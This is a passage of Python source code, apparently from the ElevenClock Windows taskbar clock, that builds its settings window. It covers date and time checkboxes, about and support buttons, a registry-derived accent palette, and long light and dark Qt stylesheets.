#self.centerText.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
#self.centerText.stateChanged.connect(lambda i: setSettings("CenterAlignment", bool(i)))
#layout.addWidget(self.centerText)
layout.addSpacing(10)
self.dateTimeTitle = QIconLabel(_("Date & Time Settings:"), getPath(f"datetime_{self.iconMode}.png"))
layout.addWidget(self.dateTimeTitle)
self.showTime = QSettingsCheckBox(_("Show time on the clock"))
self.showTime.setChecked(not getSettings("DisableTime"))
self.showTime.stateChanged.connect(lambda i: setSettings("DisableTime", not bool(i), r = False))
layout.addWidget(self.showTime)
self.showSeconds = QSettingsCheckBox(_("Show seconds on the clock"))
self.showSeconds.setChecked(getSettings("EnableSeconds"))
self.showSeconds.stateChanged.connect(lambda i: setSettings("EnableSeconds", bool(i), r = False))
layout.addWidget(self.showSeconds)
self.showDate = QSettingsCheckBox(_("Show date on the clock"))
self.showDate.setChecked(not getSettings("DisableDate"))
self.showDate.stateChanged.connect(lambda i: setSettings("DisableDate", not bool(i), r = False))
layout.addWidget(self.showDate)
self.showWeekCount = QSettingsCheckBox(_("Show week number on the clock"))
self.showWeekCount.setChecked(getSettings("EnableWeekNumber"))
self.showWeekCount.stateChanged.connect(lambda i: setSettings("EnableWeekNumber", bool(i), r = False))
layout.addWidget(self.showWeekCount)
self.showWeekday = QSettingsCheckBox(_("Show weekday on the clock"))
self.showWeekday.setChecked(getSettings("EnableWeekDay"))
self.showWeekday.stateChanged.connect(lambda i: setSettings("EnableWeekDay", bool(i)))
layout.addWidget(self.showWeekday)
self.RegionButton = QSettingsButton(_("Change date and time format (Regional settings)"), _("Regional settings"))
self.RegionButton.clicked.connect(lambda: os.startfile("intl.cpl"))
layout.addWidget(self.RegionButton)
layout.addSpacing(10)
self.experimentalTitle = QIconLabel(_("Fixes and other experimental features: (Use ONLY if something is not working)"), getPath(f"experiment_{self.iconMode}.png"))
layout.addWidget(self.experimentalTitle)
self.newFullScreenHide = QSettingsCheckBox(_("Enable hide when multi-monitor fullscreen apps are running"))
self.newFullScreenHide.setChecked(getSettings("NewFullScreenMethod"))
self.newFullScreenHide.stateChanged.connect(lambda i: setSettings("NewFullScreenMethod", bool(i)))
layout.addWidget(self.newFullScreenHide)
self.fixDash = QSettingsCheckBox(_("Fix the hyphen/dash showing over the month"))
self.fixDash.setChecked(getSettings("EnableHyphenFix"))
self.fixDash.stateChanged.connect(lambda i: setSettings("EnableHyphenFix", bool(i)))
layout.addWidget(self.fixDash)
self.fixSSL = QSettingsCheckBox(_("Alternative non-SSL update server (This might help with SSL errors)"))
self.fixSSL.setChecked(getSettings("AlternativeUpdateServerProvider"))
self.fixSSL.stateChanged.connect(lambda i: setSettings("AlternativeUpdateServerProvider", bool(i)))
layout.addWidget(self.fixSSL)
self.win32alignment = QSettingsCheckBox(_("Alternative clock alignment (may not work)"))
self.win32alignment.setChecked(getSettings("EnableWin32API"))
self.win32alignment.setStyleSheet(f"QWidget#stChkBg{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;border-bottom: 1px;}}")
self.win32alignment.stateChanged.connect(lambda i: setSettings("EnableWin32API", bool(i)))
layout.addWidget(self.win32alignment)
layout.addSpacing(10)
self.languageSettingsTitle = QIconLabel(_("About the language pack:"), getPath(f"lang_{self.iconMode}.png"))
layout.addWidget(self.languageSettingsTitle)
self.PackInfoButton = QSettingsButton(_("Translated to English by martinet101"), "")
self.PackInfoButton.button.hide()
self.PackInfoButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PackInfoButton)
self.openTranslateButton = QSettingsButton(_("Translate ElevenClock to your language"), _("Get started"))
self.openTranslateButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/blob/main/TRANSLATION.md"))
layout.addWidget(self.openTranslateButton)
layout.addSpacing(10)
self.aboutTitle = QIconLabel(_("About ElevenClock version {0}:").format(versionName), getPath(f"about_{self.iconMode}.png"))
layout.addWidget(self.aboutTitle)
self.WebPageButton = QSettingsButton(_("View ElevenClock's homepage"), _("Open"))
self.WebPageButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/"))
self.WebPageButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.WebPageButton)
self.IssueButton = QSettingsButton(_("Report an issue/request a feature"), _("Report"))
self.IssueButton.clicked.connect(lambda: os.startfile("https://github.com/martinet101/ElevenClock/issues/new/choose"))
self.IssueButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.IssueButton)
self.CofeeButton = QSettingsButton(_("Support the dev: Give me a coffee☕"), _("Open page"))
self.CofeeButton.clicked.connect(lambda: os.startfile("https://ko-fi.com/martinet101"))
self.CofeeButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.CofeeButton)
self.PichonButton = QSettingsButton(_("Icons by Icons8"), _("Webpage"))
self.PichonButton.clicked.connect(lambda: os.startfile("https://icons8.com/"))
self.PichonButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.PichonButton)
self.QtButton = QSettingsButton(_("About Qt6 (PySide6)").replace("Qt6", "Qt5").replace("PySide6", "PySide2"), _("About"))
self.QtButton.clicked.connect(lambda: QMessageBox.aboutQt(self, "ElevenClock - About Qt"))
self.QtButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.QtButton)
self.closeButton = QSettingsButton(_("Close settings"), _("Close"))
self.closeButton.clicked.connect(lambda: self.hide())
layout.addWidget(self.closeButton)
layout.addSpacing(10)
self.debbuggingTitle = QIconLabel(_("Debbugging information:"), getPath(f"bug_{self.iconMode}.png"))
layout.addWidget(self.debbuggingTitle)
self.logButton = QSettingsButton(_("Open ElevenClock's log"), _("Open"))
self.logButton.clicked.connect(lambda: self.showDebugInfo())
self.logButton.setStyleSheet("QWidget#stBtn{border-bottom-left-radius: 0px;border-bottom-right-radius: 0px;border-bottom: 0px;}")
layout.addWidget(self.logButton)
try:
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {str(int(platform.release())+1) if int(platform.version().split('.')[-1])>=22000 else platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
except Exception as e:
report(e)
self.hiddenButton = QSettingsButton(f"ElevenClock Version: {versionName} {platform.architecture()[0]} (version code {version})\nSystem version: {platform.system()} {platform.release()} {platform.win32_edition()} {platform.version()}\nSystem architecture: {platform.machine()}\n\nTotal RAM: {psutil.virtual_memory().total/(1000.**3)}\n\nSystem locale: {locale.getdefaultlocale()[0]}\nElevenClock language locale: lang_{langName}", _(""), h=140)
self.hiddenButton.button.setVisible(False)
layout.addWidget(self.hiddenButton)
layout.addSpacing(15)
self.settingsWidget.setLayout(layout)
self.scrollArea.setWidget(self.settingsWidget)
self.scrollArea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
self.scrollArea.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)
self.titlebar = QTitleBarWidget(self)
self.scrollArea.setStyleSheet(f"QScrollArea{{border-bottom-left-radius: {self.getPx(6)}px;border-bottom-right-radius: {self.getPx(6)}px;}}")
self.titlebar.setStyleSheet(f"#ControlWidget{{border-top-left-radius: {self.getPx(6)}px;border-top-right-radius: {self.getPx(6)}px;}}#closeButton{{border-top-right-radius: {self.getPx(6)}px;}}")
self.vlayout.addWidget(self.titlebar)
self.vlayout.addWidget(self.scrollArea)
self.setWindowTitle(_("ElevenClock Settings"))
self.applyStyleSheet()
self.setMinimumWidth(400)
self.updateCheckBoxesStatus()
w = QWidget()
w.setObjectName("borderBackground")
w.setLayout(self.vlayout)
self.setCentralWidget(w)
self.setMouseTracking(True)
self.resize(900, 600)
self.installEventFilter(self)
def updateCheckBoxesStatus(self):
# General settings section
if not self.enableUpdates.isChecked(): # Check if check for updates enabled
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically check for updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.installUpdates, self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
if not self.installUpdates.isChecked(): # Check if install updates enabled
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Automatically install available updates")))
checkbox.setEnabled(False)
else:
for checkbox in [self.silentUpdates, self.bypassCNAMECheck]:
checkbox.setToolTip("")
checkbox.setEnabled(True)
# Clock settings section
if not self.clockAtLeft.isChecked(): # Check if clock is on the left
self.primaryScreen.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show the clock at the left of the screen")))
self.primaryScreen.setChecked(False)
self.primaryScreen.setEnabled(False)
else:
self.primaryScreen.setToolTip("")
self.primaryScreen.setEnabled(True)
# Clock appearance
if self.blackText.isChecked(): # Check if light mode is enabled
self.lightText.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Force the clock to have black text")))
self.lightText.setChecked(False)
self.lightText.setEnabled(False)
else:
self.lightText.setToolTip("")
self.lightText.setEnabled(True)
if self.lightText.isChecked(): # Check if dark mode is enabled
self.blackText.setToolTip(_("<b>{0}</b> needs to be disabled to change this setting").format(_("Force the clock to have white text")))
self.blackText.setChecked(False)
self.blackText.setEnabled(False)
else:
self.blackText.setToolTip("")
self.blackText.setEnabled(True)
# Date & time settings
if not self.showTime.isChecked(): # Check if time is shown
self.showSeconds.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show time on the clock")))
self.showSeconds.setEnabled(False)
else:
self.showSeconds.setToolTip("")
self.showSeconds.setEnabled(True)
if not self.showDate.isChecked(): # Check if date is shown
self.showWeekCount.setToolTip(_("<b>{0}</b> needs to be enabled to change this setting").format(_("Show date on the clock")))
self.showWeekCount.setEnabled(False)
else:
self.showWeekCount.setToolTip("")
self.showWeekCount.setEnabled(True)
def applyStyleSheet(self):
colors = ['215,226,228', '160,174,183', '101,116,134', '81,92,107', '69,78,94', '41,47,64', '15,18,36', '239,105,80']
string = readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Explorer\Accent", "AccentPalette", b'\xe9\xd8\xf1\x00\xcb\xb7\xde\x00\x96}\xbd\x00\x82g\xb0\x00gN\x97\x00H4s\x00#\x13K\x00\x88\x17\x98\x00')
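        # The AccentPalette registry value appears to pack eight RGBA accent
        # colours whose alpha byte is 0x00, so splitting on b"\x00" mostly
        # yields 3-byte RGB chunks; the acc/add bookkeeping below tries to
        # recover colours that contain a zero byte in one of their channels.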
i = 0
acc = False
for color in string.split(b"\x00"):
add = True
try:
if len(color) == 3:
colors[i] = f"{color[0]},{color[1]},{color[2]}"
elif len(color) == 0:
acc = True
add = False
elif len(color) == 2 and acc:
acc = False
colors[i] = f"0,{color[0]},{color[1]}"
else:
pass
except IndexError:
pass
finally:
if add:
i += 1
self.titlebar.setFixedHeight(self.getPx(32))
if(readRegedit(r"Software\Microsoft\Windows\CurrentVersion\Themes\Personalize", "AppsUseLightTheme", 1)==0):
self.iconMode = "white"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.QtButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.titlebar.closeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.closeButton.setIcon(QIcon(getPath(f"cross_{self.iconMode}.png")))
self.titlebar.closeButton.setFixedHeight(self.getPx(32))
self.titlebar.closeButton.setFixedWidth(self.getPx(46))
self.titlebar.maximizeButton.setFixedHeight(self.getPx(32))
self.titlebar.maximizeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.maximizeButton.setIcon(QIcon(getPath(f"maximize_{self.iconMode}.png")))
self.titlebar.maximizeButton.setFixedWidth(self.getPx(46))
self.titlebar.minimizeButton.setFixedHeight(self.getPx(32))
self.titlebar.minimizeButton.setIconSize(QSize(self.getPx(12), self.getPx(12)))
self.titlebar.minimizeButton.setIcon(QIcon(getPath(f"minimize_{self.iconMode}.png")))
self.titlebar.minimizeButton.setFixedWidth(self.getPx(46))
self.setStyleSheet(f"""
#backgroundWindow {{
background-color: rgba({colors[3]}, 1);
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba({colors[3]}, 1);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 1);
}}
QToolTip {{
border: {self.getPx(1)}px solid #222222;
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #262626;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(60, 60, 60);
padding: {self.getPx(2)}px;
outline: 0px;
color: white;
background: #262626;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(60, 60, 60);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(255, 255, 255, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
QLineEdit {{
background-color: #1d1d1d;
padding: 5px;
border-radius: {self.getPx(6)}px;
border: 1px solid #262626;
}}
#background,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
background-color: #212121;
}}
QScrollArea {{
color: white;
background-color: #212121;
}}
QLabel {{
font-family: "Segoe UI Variable Display Semib";
font-weight: medium;
}}
* {{
color: #dddddd;
font-size: 8pt;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #212121;
selection-background-color: rgb({colors[4]});
border: none;
}}
QSpinBox {{
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
QPushButton {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
QPushButton:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[2]});
border-top-color: rgb({colors[1]});
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[1]});
border-top-color: rgb({colors[1]});
}}
#title{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #303030;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #303030;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #1c1c1c;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #252525;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: #303030;
color: #bbbbbb;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #2a2a2a;
border: {self.getPx(1)}px solid #444444;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[1]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stChk::indicator:checked:disabled {{
border: {self.getPx(1)}px solid #444444;
background-color: #303030;
color: #bbbbbb;
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
border: {self.getPx(1)}px solid #444444;
background-color: rgb({colors[2]});
border-radius: {self.getPx(6)}px;
image: url("{getPath("tick_white.png")}");
}}
#stCmbbx {{
width: 100px;
background-color: #363636;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #404040;
}}
#stCmbbx:disabled {{
width: 100px;
background-color: #303030;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #393939;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #393939;
}}
#stCmbbx:hover {{
background-color: #393939;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #414141;
height: {self.getPx(25)}px;
padding-left: {self.getPx(10)}px;
border-top: {self.getPx(1)}px solid #454545;
}}
#stCmbbx::drop-down {{
subcontrol-origin: padding;
subcontrol-position: top right;
padding: {self.getPx(5)}px;
border-radius: {self.getPx(6)}px;
border: none;
width: {self.getPx(30)}px;
}}
#stCmbbx::down-arrow {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(8)}px;
width: {self.getPx(8)}px;
}}
#stCmbbx::down-arrow:disabled {{
image: url("{getPath(f"down-arrow_{self.iconMode}.png")}");
height: {self.getPx(2)}px;
width: {self.getPx(2)}px;
}}
#stCmbbx QAbstractItemView {{
border: {self.getPx(1)}px solid #1c1c1c;
padding: {self.getPx(4)}px;
outline: 0px;
padding-right: {self.getPx(0)}px;
background-color: #303030;
border-radius: {self.getPx(8)}px;
}}
#stCmbbx QAbstractItemView::item{{
height: {self.getPx(30)}px;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
#stCmbbx QAbstractItemView::item:selected{{
background-color: #4c4c4c;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QScrollArea, QVBoxLayout{{
border: none;
margin: 0px;
padding: 0px;
outline: none;
}}
QScrollBar:vertical {{
background: #303030;
margin: {self.getPx(4)}px;
width: {self.getPx(20)}px;
border: none;
border-radius: {self.getPx(5)}px;
}}
QScrollBar::handle:vertical {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #505050;
}}
QScrollBar::handle:vertical:hover {{
margin: {self.getPx(3)}px;
border-radius: {self.getPx(3)}px;
background: #808080;
}}
QScrollBar::add-line:vertical {{
height: 0;
subcontrol-position: bottom;
subcontrol-origin: margin;
}}
QScrollBar::sub-line:vertical {{
height: 0;
subcontrol-position: top;
subcontrol-origin: margin;
}}
QScrollBar::up-arrow:vertical, QScrollBar::down-arrow:vertical {{
background: none;
}}
QScrollBar::add-page:vertical, QScrollBar::sub-page:vertical {{
background: none;
}}
""")
else:
self.iconMode = "black"
self.aboutTitle.setIcon(getPath(f"about_{self.iconMode}.png"))
self.dateTimeTitle.setIcon(getPath(f"datetime_{self.iconMode}.png"))
self.clockSettingsTitle.setIcon(getPath(f"clock_{self.iconMode}.png"))
self.generalSettingsTitle.setIcon(getPath(f"settings_{self.iconMode}.png"))
self.experimentalTitle.setIcon(getPath(f"experiment_{self.iconMode}.png"))
self.languageSettingsTitle.setIcon(getPath(f"lang_{self.iconMode}.png"))
self.PichonButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.QtButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.CofeeButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.startupButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.RegionButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.WebPageButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.logButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.debbuggingTitle.setIcon(QIcon(getPath(f"bug_{self.iconMode}.png")))
self.clockAppearanceTitle.setIcon(QIcon(getPath(f"appearance_{self.iconMode}.png")))
self.IssueButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.closeButton.setIcon(QIcon(getPath(f"close_{self.iconMode}.png")))
self.openTranslateButton.setIcon(QIcon(getPath(f"launch_{self.iconMode}.png")))
self.titlebar.closeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.closeButton.setIcon(QIcon(getPath(f"cross_{self.iconMode}.png")))
self.titlebar.closeButton.setFixedHeight(self.getPx(32))
self.titlebar.closeButton.setFixedWidth(self.getPx(46))
self.titlebar.maximizeButton.setFixedHeight(self.getPx(32))
self.titlebar.maximizeButton.setIconSize(QSize(self.getPx(14), self.getPx(14)))
self.titlebar.maximizeButton.setIcon(QIcon(getPath(f"maximize_{self.iconMode}.png")))
self.titlebar.maximizeButton.setFixedWidth(self.getPx(46))
self.titlebar.minimizeButton.setFixedHeight(self.getPx(32))
self.titlebar.minimizeButton.setIconSize(QSize(self.getPx(12), self.getPx(12)))
self.titlebar.minimizeButton.setIcon(QIcon(getPath(f"minimize_{self.iconMode}.png")))
self.titlebar.minimizeButton.setFixedWidth(self.getPx(46))
self.setStyleSheet(f"""
#backgroundWindow {{
background-color: rgba({colors[3]}, 1);
}}
#titlebarButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#titlebarButton:hover {{
border-radius: 0px;
background-color: rgba({colors[3]}, 1);
}}
#closeButton {{
border-radius: 0px;
border:none;
background-color: rgba(0, 0, 0, 0.01);
}}
#closeButton:hover {{
border-radius: 0px;
background-color: rgba(196, 43, 28, 1);
}}
QToolTip{{
border: {self.getPx(1)}px solid #dddddd;
padding: {self.getPx(4)}px;
border-radius: {self.getPx(6)}px;
background-color: #eeeeee;
}}
QPlainTextEdit{{
font-family: "Cascadia Mono";
background-color: #ffffff;
selection-background-color: rgb({colors[3]});
border: none;
}}
QMenu {{
border: {self.getPx(1)}px solid rgb(200, 200, 200);
padding: {self.getPx(2)}px;
outline: 0px;
color: black;
background: #eeeeee;
border-radius: {self.getPx(8)}px;
}}
QMenu::separator {{
margin: {self.getPx(2)}px;
height: {self.getPx(1)}px;
background: rgb(200, 200, 200);
}}
QMenu::icon{{
padding-left: {self.getPx(10)}px;
}}
QMenu::item{{
height: {self.getPx(30)}px;
border: none;
background: transparent;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
margin: {self.getPx(2)}px;
}}
QMenu::item:selected{{
background: rgba(0, 0, 0, 10%);
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QMenu::item:selected:disabled{{
background: transparent;
height: {self.getPx(30)}px;
outline: none;
border: none;
padding-right: {self.getPx(10)}px;
padding-left: {self.getPx(10)}px;
border-radius: {self.getPx(4)}px;
}}
QColorDialog {{
background-color: transparent;
border: none;
}}
#background,QScrollArea,QMessageBox,QDialog,QSlider,#ControlWidget{{
color: white;
}}
* {{
background-color: #eeeeee;
color: #000000;
font-size: 8pt;
}}
QPushButton {{
width: 100px;
background-color: #ffffff;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
QPushButton:hover {{
background-color: #f6f6f6;
border-radius: {self.getPx(6)}px;
border: {self.getPx(1)}px solid #dddddd;
height: {self.getPx(25)}px;
border-bottom: {self.getPx(1)}px solid #cccccc;
}}
#AccentButton{{
background-color: rgb({colors[3]});
border-color: rgb({colors[4]});
border-bottom-color: rgb({colors[5]});
color: white;
}}
#AccentButton:hover{{
background-color: rgb({colors[2]});
border-color: rgb({colors[3]});
color: white;
border-bottom-color: rgb({colors[3]});
}}
#title{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 1px;
font-size: 13pt;
border-radius: {self.getPx(6)}px;
}}
#subtitleLabel{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
padding-left: {self.getPx(20)}px;
padding-top: {self.getPx(15)}px;
padding-bottom: {self.getPx(15)}px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
font-size: 13pt;
border-top-left-radius: {self.getPx(6)}px;
border-top-right-radius: {self.getPx(6)}px;
}}
#StLbl{{
padding: 0px;
background-color: #ffffff;
margin: 0px;
border:none;
font-size: {self.getPx(11)}px;
}}
#stBtn{{
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
}}
#lastWidget{{
border-bottom-left-radius: {self.getPx(6)}px;
border-bottom-right-radius: {self.getPx(6)}px;
border-bottom: 1px;
}}
#stChkBg{{
padding: {self.getPx(15)}px;
padding-left: {self.getPx(45)}px;
background-color: #ffffff;
margin: {self.getPx(10)}px;
margin-bottom: 0px;
margin-top: 0px;
border: {self.getPx(1)}px solid #dddddd;
border-bottom: 0px;
}}
#stChk::indicator{{
height: {self.getPx(20)}px;
width: {self.getPx(20)}px;
}}
#stChk::indicator:unchecked {{
background-color: #ffffff;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:disabled {{
background-color: #eeeeee;
color: #bbbbbb;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:unchecked:hover {{
background-color: #eeeeee;
border: {self.getPx(1)}px solid #bbbbbb;
border-radius: {self.getPx(6)}px;
}}
#stChk::indicator:checked {{
border: {self.getPx(0)}px solid #bbbbbb;
background-color: rgb({colors[4]});
border-radius: {self.getPx(5)}px;
image: url("{getPath("tick_black.png")}");
}}
#stChk::indicator:checked:hover {{
